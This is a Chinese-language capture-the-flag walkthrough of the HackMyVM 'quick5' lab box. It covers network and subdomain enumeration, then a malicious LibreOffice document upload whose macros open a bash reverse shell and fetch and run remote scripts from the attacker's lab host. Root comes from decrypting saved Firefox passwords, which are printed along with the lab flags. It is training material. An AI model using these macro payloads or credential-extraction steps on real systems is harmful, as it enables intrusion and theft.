quick5
扫描一下:
寄,看来又得用virtualbox打开。
扫描一下:
信息搜集
端口扫描
rustscan -a 10.0.2.11 -- -A -sCV
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 84:e8:9c:b0:23:44:41:29:ae:7d:0b:0f:fe:88:08:c0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAXA+fE0PK4edxeuUDeROgBSy8iNSJweHfek5Q2YvWUR/7GaXViJ5ZoBXrAIVSrtxypdLs/6W6TsX0Cjt3yJuss=
| 256 44:82:b7:78:47:02:7e:b4:40:c7:6b:fd:70:68:c1:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOTz3nuGBUqN+vpFeJx/0N67XQG7k82jdfsfTyzR200y
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Quick Automative - Home
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:02:60:6D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=3/25%OT=22%CT=%CU=44248%PV=Y%DS=1%DC=D%G=N%M=080027
OS:%TM=66013A4B%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=Z%II
OS:=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7
OS:%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%
OS:W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)
Uptime guess: 8.040 days (since Sun Mar 17 03:50:51 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 10.0.2.11
目录爆破
gobuster dir -u http://10.0.2.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 -x php,txt,html,png,zip
/img (Status: 301) [Size: 304] [--> http://10.0.2.11/img/]
/index.html (Status: 200) [Size: 51519]
/.php (Status: 403) [Size: 274]
/.html (Status: 403) [Size: 274]
/css (Status: 301) [Size: 304] [--> http://10.0.2.11/css/]
/lib (Status: 301) [Size: 304] [--> http://10.0.2.11/lib/]
/js (Status: 301) [Size: 303] [--> http://10.0.2.11/js/]
/fonts (Status: 301) [Size: 306] [--> http://10.0.2.11/fonts/]
/.php (Status: 403) [Size: 274]
/.html (Status: 403) [Size: 274]
/server-status (Status: 403) [Size: 274]
feroxbuster -u http://10.0.2.11 | awk '{print $1, $6}'
301 http://10.0.2.11/img
301 http://10.0.2.11/js
301 http://10.0.2.11/css
301 http://10.0.2.11/lib
200 http://10.0.2.11/js/chart_custom_style2.js
200 http://10.0.2.11/js/custom_chart.js
200 http://10.0.2.11/js/analyser.js
200 http://10.0.2.11/img/testimonial-1.jpg
200 http://10.0.2.11/img/testimonial-3.jpg
200 http://10.0.2.11/js/popper.min.js
200 http://10.0.2.11/js/perfect-scrollbar.min.js
200 http://10.0.2.11/js/animate.js
200 http://10.0.2.11/css/custom.css
200 http://10.0.2.11/js/main.js
200 http://10.0.2.11/lib/counterup/counterup.min.js
200 http://10.0.2.11/lib/easing/easing.min.js
200 http://10.0.2.11/lib/owlcarousel/assets/owl.carousel.min.css
200 http://10.0.2.11/img/service-2.jpg
200 http://10.0.2.11/img/team-7.jpg
200 http://10.0.2.11/img/testimonial-4.jpg
200 http://10.0.2.11/img/testimonial-2.jpg
200 http://10.0.2.11/js/jquery-3.3.1.min.js
200 http://10.0.2.11/js/calendar.js
200 http://10.0.2.11/img/team-3.jpg
200 http://10.0.2.11/img/team-2.jpg
200 http://10.0.2.11/js/Chart.min.js
200 http://10.0.2.11/js/utils.js
200 http://10.0.2.11/js/custom.js
200 http://10.0.2.11/lib/tempusdominus/css/tempusdominus-bootstrap-4.min.css
200 http://10.0.2.11/css/style.css
200 http://10.0.2.11/img/team-4.jpg
200 http://10.0.2.11/img/service-3.jpg
200 http://10.0.2.11/lib/animate/animate.min.css
200 http://10.0.2.11/js/jquery.fancybox.min.js
200 http://10.0.2.11/img/team-1.jpg
200 http://10.0.2.11/img/service-1.jpg
200 http://10.0.2.11/img/service-4.jpg
200 http://10.0.2.11/js/Chart.js
200 http://10.0.2.11/js/calendar.min.js
200 http://10.0.2.11/js/settings.html
200 http://10.0.2.11/lib/wow/wow.min.js
200 http://10.0.2.11/img/team-6.jpg
200 http://10.0.2.11/img/team-8.jpg
200 http://10.0.2.11/img/about.jpg
200 http://10.0.2.11/lib/tempusdominus/js/moment-timezone.min.js
200 http://10.0.2.11/img/team-5.jpg
200 http://10.0.2.11/js/jquery.min.js
200 http://10.0.2.11/js/owl.carousel.js
200 http://10.0.2.11/img/carousel-bg-2.jpg
200 http://10.0.2.11/js/semantic.min.js
200 http://10.0.2.11/js/bootstrap.js
200 http://10.0.2.11/js/bootstrap-select.js
200 http://10.0.2.11/js/bootstrap.bundle.min.js
200 http://10.0.2.11/js/bootstrap.min.js.map
200 http://10.0.2.11/img/carousel-2.png
200 http://10.0.2.11/css/semantic.min.css
200 http://10.0.2.11/img/carousel-1.png
200 http://10.0.2.11/css/bootstrap.mini.css
200 http://10.0.2.11/lib/tempusdominus/js/tempusdominus-bootstrap-4.min.js
200 http://10.0.2.11/lib/owlcarousel/owl.carousel.min.js
200 http://10.0.2.11/index.html
200 http://10.0.2.11/img/logo.png
200 http://10.0.2.11/img/carousel-bg-1.jpg
200 http://10.0.2.11/lib/owlcarousel/assets/owl.video.play.png
200 http://10.0.2.11/lib/owlcarousel/assets/owl.theme.default.css
200 http://10.0.2.11/lib/owlcarousel/assets/owl.theme.green.css
200 http://10.0.2.11/lib/owlcarousel/assets/ajax-loader.gif
200 http://10.0.2.11/lib/owlcarousel/assets/owl.theme.green.min.css
200 http://10.0.2.11/js/bootstrap.min.js
200 http://10.0.2.11/js/jquery.fancybox.js
200 http://10.0.2.11/js/bootstrap.bundle.js
200 http://10.0.2.11/js/Chart.bundle.min.js
200 http://10.0.2.11/js/bootstrap.bundle.js.map
200 http://10.0.2.11/js/bootstrap.bundle.min.js.map
200 http://10.0.2.11/lib/tempusdominus/css/tempusdominus-bootstrap-4.css
200 http://10.0.2.11/lib/owlcarousel/assets/owl.carousel.css
200 http://10.0.2.11/lib/owlcarousel/assets/owl.theme.default.min.css
200 http://10.0.2.11/lib/owlcarousel/LICENSE
200 http://10.0.2.11/lib/tempusdominus/js/moment.min.js
200 http://10.0.2.11/lib/animate/animate.css
200 http://10.0.2.11/lib/tempusdominus/js/tempusdominus-bootstrap-4.js
200 http://10.0.2.11/js/Chart.bundle.js
200 http://10.0.2.11/lib/owlcarousel/owl.carousel.js
301 http://10.0.2.11/fonts
200 http://10.0.2.11/fonts/Flaticon.ttf
200 http://10.0.2.11/fonts/flaticon.html
200 http://10.0.2.11/fonts/flaticon.css
200 http://10.0.2.11/fonts/_flaticon.scss
200 http://10.0.2.11/fonts/glyphicons-halflings-regular.eot
200 http://10.0.2.11/fonts/fontawesome-webfont.ttf
200 http://10.0.2.11/fonts/glyphicons-halflings-regular.woff2
200 http://10.0.2.11/fonts/fontawesome-webfont.eot
200 http://10.0.2.11/fonts/fontawesome-webfont.woff2
200 http://10.0.2.11/fonts/Flaticon.woff
200 http://10.0.2.11/fonts/glyphicons-halflings-regular.woff
200 http://10.0.2.11/fonts/glyphicons-halflings-regular.svg
200 http://10.0.2.11/fonts/Flaticon.eot
200 http://10.0.2.11/fonts/fontawesome-webfont.woff
200 http://10.0.2.11/fonts/glyphicons-halflings-regular.ttf
200 http://10.0.2.11/lib/waypoints/waypoints.min.js
200 http://10.0.2.11/
200 http://10.0.2.11/lib/waypoints/links.php
200 http://10.0.2.11/lib/wow/wow.js
200 http://10.0.2.11/css/all.min.css
200 http://10.0.2.11/css/flaticon.css
200 http://10.0.2.11/fonts/FontAwesome.otf
200 http://10.0.2.11/css/bootstrap.css.map
200 http://10.0.2.11/fonts/fontawesome-webfont.svg
200 http://10.0.2.11/css/bootstrap.min.css.map
200 http://10.0.2.11/css/bootstrap-reboot.min.css
200 http://10.0.2.11/css/bootstrap-icons.css
200 http://10.0.2.11/css/calendar.css
200 http://10.0.2.11/css/perfect-scrollbar.css
200 http://10.0.2.11/css/bootstrap-reboot.css
200 http://10.0.2.11/css/bootstrap-grid.min.css
200 http://10.0.2.11/css/calendar.min.css
200 http://10.0.2.11/fonts/Flaticon.svg
200 http://10.0.2.11/css/color_2.css
200 http://10.0.2.11/css/bootstrap-reboot.css.map
200 http://10.0.2.11/css/bootstrap-grid.min.css.map
200 http://10.0.2.11/css/jquery.fancybox.min.css
200 http://10.0.2.11/css/bootstrap-grid.css.map
200 http://10.0.2.11/css/font-awesome.min.css
200 http://10.0.2.11/css/owl.carousel.css
200 http://10.0.2.11/css/font-awesome.css
200 http://10.0.2.11/css/animate.css
200 http://10.0.2.11/css/bootstrap-grid.css
200 http://10.0.2.11/css/bootstrap-reboot.min.css.map
200 http://10.0.2.11/css/jquery.fancybox.css
200 http://10.0.2.11/js/chart_custom_style1.js
200 http://10.0.2.11/css/bootstrap-select.css
200 http://10.0.2.11/css/responsive.css
200 http://10.0.2.11/css/baguetteBox.min.css
200 http://10.0.2.11/css/bootstrap.css
200 http://10.0.2.11/js/bootstrap.js.map
200 http://10.0.2.11/lib/easing/easing.js
漏洞扫描
nikto -h http://10.0.2.11
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.11
+ Target Hostname: 10.0.2.11
+ Target Port: 80
+ Start Time: 2024-03-25 04:56:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: c93f, size: 61148fc459500, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /lib/: Directory indexing found.
+ /lib/: This might be interesting.
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2024-03-25 04:57:00 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
插件信息搜集
因为这里的我的virtualbox kali
虚拟机有点问题,所以我尝试使用桥接,在主机上操作。
漏洞挖掘
访问看一下
尝试搜查中间件漏洞
看来暂时没有我们想要的,继续尝试。
修改hosts
172.20.10.9 careers.quick.hmv
发现上传的地方:
http://careers.quick.hmv/apply.php
上传时限制了:
扫一下:
sudo dirsearch -u http://careers.quick.hmv/ -e* -i 200,300-399 2>/dev/null
[05:42:26] Starting:
[05:42:26] 301 - 319B - /js -> http://careers.quick.hmv/js/
[05:42:47] 301 - 320B - /css -> http://careers.quick.hmv/css/
[05:42:51] 301 - 322B - /fonts -> http://careers.quick.hmv/fonts/
[05:42:53] 301 - 320B - /img -> http://careers.quick.hmv/img/
[05:42:55] 200 - 909B - /js/
[05:42:56] 200 - 525B - /lib/
[05:42:56] 301 - 320B - /lib -> http://careers.quick.hmv/lib/
[05:43:15] 200 - 0B - /upload.php
继续看:
http://customer.quick.hmv/
sudo dirsearch -u http://customer.quick.hmv/ -e* -i 200,300-399 2>/dev/null
没扫出来啥东西。
可以fuzz一下:
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u careers.quick.hmv -H "Host: FUZZ.quick.hmv" 2>/dev/null
然后忽略响应相似的。
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u careers.quick.hmv -H "Host: FUZZ.quick.hmv" --hh 51519 2>/dev/null
找到好几个!
尝试obt钓鱼
kali: 172.20.10.8
attacked: 172.20.10.9
REM ***** BASIC *****
Sub Main
Shell("bach -c 'bash -i >& /dev/tcp/172.20.10.8/1234 0>&1'")
End Sub
参考:https://exploit-notes.hdks.org/exploit/malware/libreoffice-macros/
等待一两分钟,行就会弹,不行就弹不了了,得尝试其他方法。
这里以防万一重启一下,但是重启以后任然没有弹回来,尝试其他方案。
尝试宏漏洞
google搜索漏洞,发现:
这个漏洞可以尝试利用一下:
使用方法:
Just an example to drop a webshell in current directory.
python3 CVE-2023-2255.py --cmd 'wget https://raw.githubusercontent.com/elweth-sec/CVE-2023-2255/main/webshell.php' --output 'exploit.odt'
# kali
git clone https://github.com/elweth-sec/CVE-2023-2255.git
cd CVE-2023-2255
python3 CVE-2023-2255.py --cmd 'wget https://raw.githubusercontent.com/elweth-sec/CVE-2023-2255/main/webshell.php' --output 'exploit.odt'
但是听说困难重重。
msf也有相关做法,尝试一下师傅给的提示:
# 制作一个odt
use exploit/multi/misc/openoffice_document_macro
set srvhost 172.20.10.8
set srvport 1234
run
使用msf获得的opt文件进行操作:
REM ***** BASIC *****
Sub Onload
Shell("wget 'http://172.20.10.8:8888/remote.sh' -O /tmp/remote.sh")
Shell("sh /tmp/remote.sh")
Shell("wget 'http://172.20.10.8:8888/reverseshell.php' -O /tmp/reverseshell.php")
Shell("php /tmp/reverseshell.php")
End Sub
我们可以直接解压\Basic\Standard\Module1.xml
修改成如下方案:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM ***** BASIC *****
Sub Onload
Shell("wget 'http://172.20.10.8:8888/remote.sh' -O /tmp/remote.sh ")
Shell("sh /tmp/remote.sh ")
Shell("wget 'http://172.20.10.8:8888/reverseshell.php' ")
Shell("php reverseshell.php")
End Sub
</script:module>
"
编码以后是"
哦!
压缩更改后缀名后上传:
但是愚蠢的是我没有监听。。。
重启靶机突然拿到shell!
查看flag:
HMV{f1a85c0f54de51d374e15a73a2d71cd6}
提权
扩展shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
信息搜集
andrew@quick5:~$ cat /etc/cron*
cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat: /etc/cron.weekly: Is a directory
andrew@quick5:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount3
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/snapd/20671/usr/lib/snapd/snap-confine
/snap/core20/2182/usr/bin/chfn
/snap/core20/2182/usr/bin/chsh
/snap/core20/2182/usr/bin/gpasswd
/snap/core20/2182/usr/bin/mount
/snap/core20/2182/usr/bin/newgrp
/snap/core20/2182/usr/bin/passwd
/snap/core20/2182/usr/bin/su
/snap/core20/2182/usr/bin/sudo
/snap/core20/2182/usr/bin/umount
/snap/core20/2182/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2182/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/snap/core22/1122/usr/bin/chfn
/snap/core22/1122/usr/bin/chsh
/snap/core22/1122/usr/bin/gpasswd
/snap/core22/1122/usr/bin/mount
/snap/core22/1122/usr/bin/newgrp
/snap/core22/1122/usr/bin/passwd
/snap/core22/1122/usr/bin/su
/snap/core22/1122/usr/bin/sudo
/snap/core22/1122/usr/bin/umount
/snap/core22/1122/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1122/usr/lib/openssh/ssh-keysign
/snap/core22/1122/usr/libexec/polkit-agent-helper-1
/opt/VBoxGuestAdditions-7.0.12/bin/VBoxDRMClient
且慢,先上传一个authorized_keys
ssh-keygen -t rsa -C "quick5"
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCbrW90A8zCeztsR2sZ48sYtO3HjhFmHnHWBjaNiSW6K8HsT64yrInxATvXqaS3Nx1PsIIdp/VJ1618+XBwtsTHM0ViDPGM3WLp5G7qCcIjITXr3Yr1WJyJ2JbwE6NRZCJ8967WVjzD8vDpapkdL1vb8yKG2Ofhym4KEbDEvBfZSoxjdmHfSGL2F+VOYxcw3h3qxM8KEjWjVqv8NEx7xPcU4sHqEspdfsg/d/pbyUQMz5SwTZ2UQhHx49BLY6ouozjYi2FnJwXBS7kqAQ21/pOlOjTYRVVJ8wEzSRVOx/D3G11WkfEtobgsXen1t/90ZWIcp2HVS54F5ZyP2Uc2+5/YwjnNpkuRnZpveTZz+WcKe3ulSfMVGO1Z741ACLVUDWBaDZwKH8zVdLyOVkko/FkrboWi8QfibPLphx/tmwM6AewXDT5T9MpvUBAfS9Fnddz5nCkHRffIXGboDRCse2UZum3ArbVqBQ7IQriqbo5Lk4r4ozIvAUDv80xn2j1E5Qs= root@kali" > authorized_keys
ssh andrew@172.20.10.9 -i quick5
寻找突破口
到处找,发现一个文件:
下载到本地发现没啥用,傻了,没看file信息,只看了一个elf就傻傻的甩过来了。。。
临时起意查了一下环境变量:
andrew@quick5:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
猜测还是和games有关:
查看一下:
andrew@quick5:/usr/games$ ./gamemoderun
SHELL=/bin/bash
PWD=/usr/games
LOGNAME=andrew
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/andrew
LANG=en_US.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=172.20.10.8 53266 172.20.10.9 22
LESSCLOSE=/usr/bin/lesspipe %s %s
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=| /usr/bin/lesspipe %s
USER=andrew
SHLVL=1
XDG_SESSION_ID=28
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=172.20.10.8 53266 22
XDG_DATA_DIRS=/usr/share/gnome:/usr/local/share:/usr/share:/var/lib/snapd/desktop
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
SSH_TTY=/dev/pts/1
OLDPWD=/usr/local/games
LD_PRELOAD=libgamemodeauto.so.0
andrew@quick5:/usr/games$ ./gamemode-simulate-game
whoami
id
^C
andrew@quick5:/usr/games$ ./sol
Cannot open display:
andrew@quick5:/usr/games$ ./gnome-mahjongg
(gnome-mahjongg:3622): Gtk-WARNING **: 14:09:14.223: cannot open display:
andrew@quick5:/usr/games$ ./gnome-mines
(gnome-mines:3625): Gtk-WARNING **: 14:09:23.234: cannot open display:
andrew@quick5:/usr/games$ ./gnome-sudoku
(gnome-sudoku:3628): Gtk-WARNING **: 14:09:29.072: cannot open display:
挨个file一下:
andrew@quick5:/usr/local/games$ cd /usr/games
andrew@quick5:/usr/games$ file *
gamemoderun: Bourne-Again shell script, ASCII text executable
gamemode-simulate-game: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=70c6cb18dc46babab5dbebe2b1039acb12d36919, for GNU/Linux 3.2.0, stripped
gnome-mahjongg: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=23d1ddfdf8e30dc5ca313de31ffa5973408b7d10, for GNU/Linux 3.2.0, stripped
gnome-mines: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6b1a9fb674b123645a9e165ec1e17466eabd5d4e, for GNU/Linux 3.2.0, stripped
gnome-sudoku: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5b19db35d2d172fb676c1be119dd688b4aef0608, for GNU/Linux 3.2.0, stripped
sol: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=db9ee2866767482c878d8fb720f10a9842a8a477, for GNU/Linux 3.2.0, stripped
然后发现:
strings gamemoderun
#!/bin/bash
# Helper script to launch games with gamemode
GAMEMODEAUTO_NAME="libgamemodeauto.so.0"
# ld will find the right path to load the library, including for 32-bit apps.
LD_PRELOAD="${GAMEMODEAUTO_NAME}${LD_PRELOAD:+:$LD_PRELOAD}"
exec env LD_PRELOAD="${LD_PRELOAD}" $GAMEMODERUNEXEC "$@"
上传linpeas.sh分析
# kali
python3 -m http.server 8888
# andrew
wget http://172.20.10.8:8888/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
找到了之前执行宏病毒的代码:
andrew 2317 0.0 0.0 2892 984 ? Ss 15:06 0:00 _ /bin/sh -c cd /home/andrew/applicants && file=$(ls -t | head -n 1) && soffice --nolockcheck --norestore -o "$file"
猜测要进入桌面环境才可以玩游戏获取flag。。。
寻找凭证
找到:
/.local/share/keyrings
但是似乎解密不来,经过28righthand
师傅的提示,发现了一个firefox
压缩包(其实我之前也看到了,但是没检查出来啥)
使用firefox_decrypt提取firefox存储的密码:
git clone https://github.com/unode/firefox_decrypt.git
python3 -m http.server 8888
andrew@quick5:~/snap$ wget http://172.20.10.8:8888/firefox_decrypt.py
--2024-03-25 17:43:27-- http://172.20.10.8:8888/firefox_decrypt.py
Connecting to 172.20.10.8:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39242 (38K) [text/x-python]
Saving to: ‘firefox_decrypt.py’
firefox_decrypt.py 100%[============================================================================>] 38.32K --.-KB/s in 0s
2024-03-25 17:43:27 (241 MB/s) - ‘firefox_decrypt.py’ saved [39242/39242]
andrew@quick5:~/snap$ chmod +x firefox_decrypt.py
andrew@quick5:~/snap$ ./firefox
firefox/ firefox_decrypt.py
andrew@quick5:~/snap$ python3 firefox_decrypt.py
2024-03-25 17:43:49,253 - WARNING - profile.ini not found in /home/andrew/.mozilla/firefox
2024-03-25 17:43:49,253 - WARNING - Continuing and assuming '/home/andrew/.mozilla/firefox' is a profile location
2024-03-25 17:43:49,253 - ERROR - Profile location '/home/andrew/.mozilla/firefox' is not a directory
andrew@quick5:~/snap$ ln -s /home/andrew/snap/firefox/common/.mozilla /home/andrew/.mozilla
andrew@quick5:~/snap$ python3 firefox_decrypt.py
Website: http://employee.quick.hmv
Username: 'andrew.speed@quick.hmv'
Password: 'SuperSecretPassword'
这里的程序会默认搜索配置文件
.mozilla
,但是我们的firefox配置文件不在默认位置,我们需要链接一下:
ln -s /home/andrew/snap/firefox/common/.mozilla /home/andrew/.mozilla
尝试su root
,成功!
HMV{7b243f33c5eb851f1c73fb6d6b3a974a}
疯狂致谢28righthand师傅!!!!
师傅疯狂给我提示!!!可惜我太笨了,好在结果是好的!爱你呀师傅!
还有师傅的教诲!